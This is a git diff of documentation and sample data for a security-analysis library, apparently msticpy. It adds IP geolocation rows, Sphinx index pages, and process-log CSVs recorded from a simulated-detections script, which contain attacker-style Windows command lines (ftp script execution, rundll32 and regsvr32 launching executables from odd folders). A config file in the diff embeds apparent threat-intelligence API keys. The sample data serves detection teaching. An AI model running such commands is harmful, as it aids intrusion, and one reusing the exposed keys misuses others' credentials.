+37,40.87.63.92,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},40.87.63.92
+38,40.80.145.38,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},40.80.145.38
+39,23.47.27.169,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.47.27.169
+40,65.55.163.78,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},65.55.163.78
+41,172.217.15.78,US,United States,,,-97.822,37.751,,set(),geolocation,{},172.217.15.78
+42,65.55.163.76,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},65.55.163.76
+43,172.217.8.3,US,United States,,,-97.822,37.751,,set(),geolocation,{},172.217.8.3
+44,13.74.179.117,IE,Ireland,Leinster,Dublin,-6.2489,53.3331,,set(),geolocation,{},13.74.179.117
+45,90.130.70.73,SE,Sweden,,,18.056,59.3247,,set(),geolocation,{},90.130.70.73
+46,65.55.252.190,US,United States,Washington,,-122.3412,47.6032,,set(),geolocation,{},65.55.252.190
+47,40.69.153.67,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},40.69.153.67
+48,99.84.104.63,US,United States,,,-97.822,37.751,,set(),geolocation,{},99.84.104.63
+49,157.55.134.136,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},157.55.134.136
+50,72.21.81.200,US,United States,,,-97.822,37.751,,set(),geolocation,{},72.21.81.200
+51,204.79.197.200,US,United States,,,-97.822,37.751,,set(),geolocation,{},204.79.197.200
+52,99.84.106.178,US,United States,,,-97.822,37.751,,set(),geolocation,{},99.84.106.178
+53,23.3.13.106,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.3.13.106
+54,99.84.106.27,US,United States,,,-97.822,37.751,,set(),geolocation,{},99.84.106.27
+55,23.45.180.234,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.45.180.234
+56,99.84.106.92,US,United States,,,-97.822,37.751,,set(),geolocation,{},99.84.106.92
+57,23.3.13.146,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.3.13.146
+58,23.3.13.112,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.3.13.112
+59,13.68.226.108,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},13.68.226.108
+60,212.13.197.231,GB,United Kingdom,,,-0.1224,51.4964,,set(),geolocation,{},212.13.197.231
+61,46.43.34.31,GB,United Kingdom,,,-0.1224,51.4964,,set(),geolocation,{},46.43.34.31
+62,104.211.30.1,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},104.211.30.1
+63,52.183.114.173,US,United States,Washington,,-122.3412,47.6032,,set(),geolocation,{},52.183.114.173
+64,40.79.85.125,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},40.79.85.125
+65,157.55.135.128,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},157.55.135.128
+66,172.217.8.14,US,United States,,,-97.822,37.751,,set(),geolocation,{},172.217.8.14
+67,13.89.220.65,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},13.89.220.65
+68,23.4.187.27,US,United States,Virginia,Sterling,-77.4269,39.0024,,set(),geolocation,{},23.4.187.27
+69,52.165.175.144,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},52.165.175.144
+70,23.48.36.47,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.48.36.47
+71,52.173.26.181,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},52.173.26.181
+72,23.45.180.121,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.45.180.121
+73,20.42.24.50,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},20.42.24.50
+74,13.64.188.245,US,United States,California,San Jose,-121.8914,37.3388,,set(),geolocation,{},13.64.188.245
+75,13.83.148.218,US,United States,California,San Jose,-121.8914,37.3388,,set(),geolocation,{},13.83.148.218
+76,65.55.163.80,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},65.55.163.80
+77,134.170.58.123,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},134.170.58.123
+78,173.194.61.40,US,United States,,,-97.822,37.751,,set(),geolocation,{},173.194.61.40
+79,216.58.218.238,US,United States,Utah,Bluffdale,-111.9439,40.4953,,set(),geolocation,{},216.58.218.238
+80,13.86.124.191,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},13.86.124.191
+81,13.89.187.212,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},13.89.187.212
+82,20.41.41.23,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},20.41.41.23
+83,52.179.17.38,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},52.179.17.38
+84,157.55.134.142,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},157.55.134.142
+85,172.217.15.110,US,United States,,,-97.822,37.751,,set(),geolocation,{},172.217.15.110
+86,40.91.75.5,US,United States,Washington,,-122.3412,47.6032,,set(),geolocation,{},40.91.75.5
diff --git a/docs/notebooks/data/linux_proc_test.pkl b/docs/notebooks/data/linux_proc_test.pkl
new file mode 100644
index 000000000..293033f96
Binary files /dev/null and b/docs/notebooks/data/linux_proc_test.pkl differ
diff --git a/doc/data/process_tree.csv b/docs/notebooks/data/process_tree.csv
similarity index 99%
rename from doc/data/process_tree.csv
rename to docs/notebooks/data/process_tree.csv
index 659c84c79..d493ac321 100644
--- a/doc/data/process_tree.csv
+++ b/docs/notebooks/data/process_tree.csv
@@ -2,8 +2,8 @@
 0,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\ftp.exe,%%1936,0xbc8,.\ftp  -s:C:\RECYCLER\xxppyy.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.677,source,0,,
 1,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  not /domain:everything that /sid:shines is /krbtgt:golden !,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.167,sibling,1,,
 2,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.277,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1700,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""systeminfo && systeminfo""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.277,sibling,1,,
-3,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 12345.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340,sibling,1,,
-4,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\12345.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400,sibling,1,,
+3,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340,sibling,1,,
+4,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400,sibling,1,,
 5,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.430,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x176c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.430,sibling,1,,
 6,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a0,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.500,sibling,1,,
 7,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.510,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C reg.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.510,sibling,1,,
@@ -115,4 +115,4 @@
 113,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.693,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32  /u /s c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.693,sibling,1,,
 114,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Windows\System32\tasklist.exe,%%1936,0xbc8,tasklist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.770,sibling,1,,
 115,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbc8,C:\Windows\System32\cmd.exe,%%1936,0x440,cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp,C:\Windows\System32\svchost.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.047,parent,1,,
-116,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.053,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15a0,C:\Windows\System32\win32calc.exe,%%1936,0x1580,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.053,child,1,,
+116,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.053,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15a0,C:\Windows\System32\win32calc.exe,%%1936,0x1580,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.053,child,1,,
\ No newline at end of file
diff --git a/doc/data/processes_on_host.csv b/docs/notebooks/data/processes_on_host.csv
similarity index 99%
rename from doc/data/processes_on_host.csv
rename to docs/notebooks/data/processes_on_host.csv
index 4ae795d0f..8e86d8826 100644
--- a/doc/data/processes_on_host.csv
+++ b/docs/notebooks/data/processes_on_host.csv
@@ -47,9 +47,9 @@
 45,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:13:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:13:26.007
 46,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  not /domain:everything that /sid:shines is /krbtgt:golden !,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.167
 47,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.277,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1700,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""systeminfo && systeminfo""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.277
-48,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 12345.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340
-49,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.353,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1738,C:\Diagnostics\UserTmp\12345.exe,%%1936,0x1728,12345.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.353
-50,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\12345.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400
+48,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340
+49,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.353,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1738,C:\Diagnostics\UserTmp\42424.exe,%%1936,0x1728,42424.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.353
+50,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400
 51,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.430,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x176c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.430
 52,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\1234.exe,%%1936,0x176c,1234.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.447
 53,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a0,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.500
diff --git a/docs/notebooks/data/procs_with_cluster.pkl b/docs/notebooks/data/procs_with_cluster.pkl
new file mode 100644
index 000000000..bf9f6376c
Binary files /dev/null and b/docs/notebooks/data/procs_with_cluster.pkl differ
diff --git a/docs/notebooks/data/sent_incidents.pkl b/docs/notebooks/data/sent_incidents.pkl
new file mode 100644
index 000000000..1da4477ec
Binary files /dev/null and b/docs/notebooks/data/sent_incidents.pkl differ
diff --git a/docs/notebooks/data/win_proc_test.pkl b/docs/notebooks/data/win_proc_test.pkl
new file mode 100644
index 000000000..d5f23d5a7
Binary files /dev/null and b/docs/notebooks/data/win_proc_test.pkl differ
diff --git a/docs/notebooks/msticpyconfig.yaml b/docs/notebooks/msticpyconfig.yaml
new file mode 100644
index 000000000..e0b8de18a
--- /dev/null
+++ b/docs/notebooks/msticpyconfig.yaml
@@ -0,0 +1,25 @@
+QueryDefinitions:
+
+TIProviders:
+  OTX:
+    Args:
+      AuthKey: "55f148f26043fae2509198190d9111e1f059b14494f2608f9b3ea43f744d7fb2"
+    Primary: True
+    Provider: "OTX" # Explicitly name provider to override
+  VirusTotal:
+    Args:
+      AuthKey: "fbe87704dae3d315967145642dedc8cf3301fa8186fc1358090aea9bb334b755"
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID: "d99c9637-3049-4c1e-b608-18c3bad769f9"
+      AuthKey: "f3531662-7849-4080-9e79-b728daadc2e8"
+    Primary: True
+    Provider: "XForce"
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "35a9e601-82db-42da-b521-efc4a2f6783c"
+    Primary: False
+    Provider: "AzSTI"
\ No newline at end of file
diff --git a/docs/requirements.txt b/docs/requirements.txt
new file mode 100644
index 000000000..7fd0d58a7
--- /dev/null
+++ b/docs/requirements.txt
@@ -0,0 +1,5 @@
+msticpy
+sphinx==4.4.0
+docutils<0.18.0
+sphinx-rtd-theme==1.0.0
+readthedocs-sphinx-ext==2.1.4
diff --git a/docs/source/DataAcquisition.rst b/docs/source/DataAcquisition.rst
new file mode 100644
index 000000000..2e2769fbe
--- /dev/null
+++ b/docs/source/DataAcquisition.rst
@@ -0,0 +1,49 @@
+Querying and Importing Data
+===========================
+
+Common Data Provider Operations
+-------------------------------
+
+.. toctree::
+   :maxdepth: 2
+
+   data_acquisition/DataProviders
+
+
+Individual Data Environments
+----------------------------
+
+.. toctree::
+   :maxdepth: 2
+
+   data_acquisition/DataProv-MSSentinel
+   data_acquisition/DataProv-MSDefender
+   data_acquisition/DataProv-MSGraph
+   data_acquisition/DataProv-LocalData
+   data_acquisition/SplunkProvider
+   data_acquisition/ResourceGraphDriver
+   data_acquisition/MordorData
+   data_acquisition/DataProv-Sumologic
+   data_acquisition/DataProv-Kusto
+
+
+Built-in Data Queries
+---------------------
+
+.. toctree::
+   :maxdepth: 2
+
+   data_acquisition/DataQueries
+
+Other Data Modules and Functions
+--------------------------------
+
+.. toctree::
+   :maxdepth: 2
+
+   data_acquisition/CollectingLinuxAuditLogs
+   data_acquisition/UploadData
+   data_acquisition/DataMasking
+   data_acquisition/AzureBlobStorage
+   data_acquisition/SqlToKql
+   data_acquisition/CybereasonProvider
diff --git a/docs/source/DataAnalysis.rst b/docs/source/DataAnalysis.rst
new file mode 100644
index 000000000..4e8d48710
--- /dev/null
+++ b/docs/source/DataAnalysis.rst
@@ -0,0 +1,12 @@
+Analyzing Data
+==============
+
+
+.. toctree::
+   :maxdepth: 2
+
+   data_analysis/Base64Unpack
+   data_analysis/IoCExtract
+   data_analysis/EventClustering
+   data_analysis/AnomalousSequence
+   data_analysis/PivotFunctions
\ No newline at end of file
diff --git a/docs/source/DataEnrichment.rst b/docs/source/DataEnrichment.rst
new file mode 100644
index 000000000..06d31dcec
--- /dev/null
+++ b/docs/source/DataEnrichment.rst
@@ -0,0 +1,10 @@
+Enriching Data
+==============
+
+.. toctree::
+   :maxdepth: 2
+
+   data_acquisition/TIProviders
+   data_acquisition/GeoIPLookups
+   data_acquisition/AzureData
+   data_acquisition/Sentinel
\ No newline at end of file
diff --git a/docs/source/GettingStarted.rst b/docs/source/GettingStarted.rst
new file mode 100644
index 000000000..ff5442564
--- /dev/null
+++ b/docs/source/GettingStarted.rst
@@ -0,0 +1,14 @@
+Getting Started
+===============
+
+
+.. toctree::
+   :maxdepth: 2
+
+   getting_started/Introduction
+   getting_started/Installing
+   getting_started/PackageSummary
+   getting_started/msticpyconfig
+   getting_started/SettingsEditor
+   getting_started/JupyterAndSecurity
+   getting_started/JupyterAndAzureSentinel
diff --git a/docs/source/Releases.rst b/docs/source/Releases.rst
new file mode 100644
index 000000000..7558dddc3
--- /dev/null
+++ b/docs/source/Releases.rst
@@ -0,0 +1,4 @@
+Releases
+========
+
+Release notes are available `on our GitHub repo <https://github.com/microsoft/msticpy/releases>`__
diff --git a/docs/source/Visualization.rst b/docs/source/Visualization.rst
new file mode 100644
index 000000000..cd8a3fca8
--- /dev/null
+++ b/docs/source/Visualization.rst
@@ -0,0 +1,16 @@
+Displaying/Visualizing Data
+==============================
+
+
+.. toctree::
+   :maxdepth: 2
+
+   visualization/EventTimeline
+   visualization/ProcessTree
+   visualization/NotebookWidgets
+   visualization/FoliumMap
+   visualization/TimeSeriesAnomalies
+   visualization/MorphCharts
+   visualization/DataViewer
+   visualization/MatrixPlot
+   visualization/EntityGraph
diff --git a/docs/source/_static/launch-space.png b/docs/source/_static/launch-space.png
new file mode 100644
index 000000000..be7a1cff9
Binary files /dev/null and b/docs/source/_static/launch-space.png differ
diff --git a/docs/source/_static/msticpy-lab.png b/docs/source/_static/msticpy-lab.png
new file mode 100644
index 000000000..8d6c683ce
Binary files /dev/null and b/docs/source/_static/msticpy-lab.png differ
diff --git a/docs/source/_static/msticpy-medium.png b/docs/source/_static/msticpy-medium.png
new file mode 100644
index 000000000..084eb6876
Binary files /dev/null and b/docs/source/_static/msticpy-medium.png differ
diff --git a/docs/source/api-how-to-read.rst b/docs/source/api-how-to-read.rst
new file mode 100644
index 000000000..9758cb2ab
--- /dev/null
+++ b/docs/source/api-how-to-read.rst
@@ -0,0 +1,92 @@
+Guide to Reading the API Reference
+==================================
+
+The API documentation is auto-generated using sphinx and the napolean 
+sphinx extension. Some of the layout and terminology may need some 
+more explanation.
+
+API Documentation Structure
+---------------------------
+The API listings are grouped by sub-package, then module, then class.
+
+The class layout can appear a little confusing because of 
+some limitations of the autodocumentation (or more likely some
+limitations of my knowledge of how to use it).
+
+In particular, the documented public **attributes** of classes (actually, 
+attributes of class instances) are included without a header section.
+
+Class documentation is layed out in the following structure:
+
+- **Class summary**: the ``__init__`` signature header
+   * **Attributes**: 
+      Documented public attributes (other than 
+      explicit properties). The Attributes section has no title so everything
+      you see until the instance creation documentation is an attribute.
+   * **Class instantiation**: 
+      the ``__init__`` signature and 
+      documentation, i.e. the syntax to create
+      a new instance of this class.
+   * **Class methods** and **Class properties**.
+
+
+Type Annotations
+----------------
+The package uses type annotations with types imported from the
+``typing`` library. For a full explanation of how these are used 
+and how to interpret some of the odder-looking types please 
+see `PEP 484 <https://www.python.org/dev/peps/pep-0484/>`__.
+
+``typing`` uses abstract classes to help deal with duck typing - e.g. 
+``MyFancyList`` may implement all required ``list`` interfaces but not 
+actually be derived from ``list``.
+
+Most of the types used are easily interpretable (e.g. ``Tuple ~= tuple``)
+with the advantage that you can supply type annotations to Tuple's
+members - e.g. ``Tuple[str, int, float]``.
+
+Some members of ``typing`` are a little more esoteric:
+
+``Mapping``
+"""""""""""
+
+An object supporting keyed access to its members (like a ``dict``).
+E.g. ``Mapping[str, MyClass]``: when this appears in a parameter type 
+annotation, it means that any dict-like object (that takes a type str
+as a key and returns an object of type MyClass) T2 is acceptable. 
+This is more rarely used in return type annotations but means that
+the returned object will support keyed access to members but not necessarily
+implement everything that ``dict`` supports.
+
+``Iterable``
+""""""""""""
+
+An object that supports iterator interface.
+e.g. ``Iterable[int]``
+
+``Optional``
+""""""""""""
+
+The specified type maybe present or None.
+e.g. ``Optional[str]``: means that either str or None is
+accepted or returned.
+
+``Union``
+"""""""""
+
+More general form of ``Optional`` where multiple types are 
+acceptable.
+e.g. ``Union[str, float]``: means that either a str or a float is acceptable
+
+``Any``
+"""""""
+
+Any type is acceptable.
+
+
+References
+----------
+
+- `PEP 484 <https://www.python.org/dev/peps/pep-0484/>`__
+- `Numpy docstring standards <https://numpydoc.readthedocs.io/en/latest/format.html#docstring-standard>`__
+- `Sphinx autodoc extension <https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html#module-sphinx.ext.autodoc>`__
diff --git a/docs/source/api/msticpy.analysis.anomalous_sequence.rst b/docs/source/api/msticpy.analysis.anomalous_sequence.rst
new file mode 100644
index 000000000..0fa36e4a7
--- /dev/null
+++ b/docs/source/api/msticpy.analysis.anomalous_sequence.rst
@@ -0,0 +1,45 @@
+msticpy.analysis.anomalous\_sequence package
+============================================
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.analysis.anomalous_sequence.utils
+
+Submodules
+----------
+
+msticpy.analysis.anomalous\_sequence.anomalous module
+-----------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.anomalous
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.model module
+-------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.model
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.sessionize module
+------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.sessionize
+   :members:
+   :undoc-members:
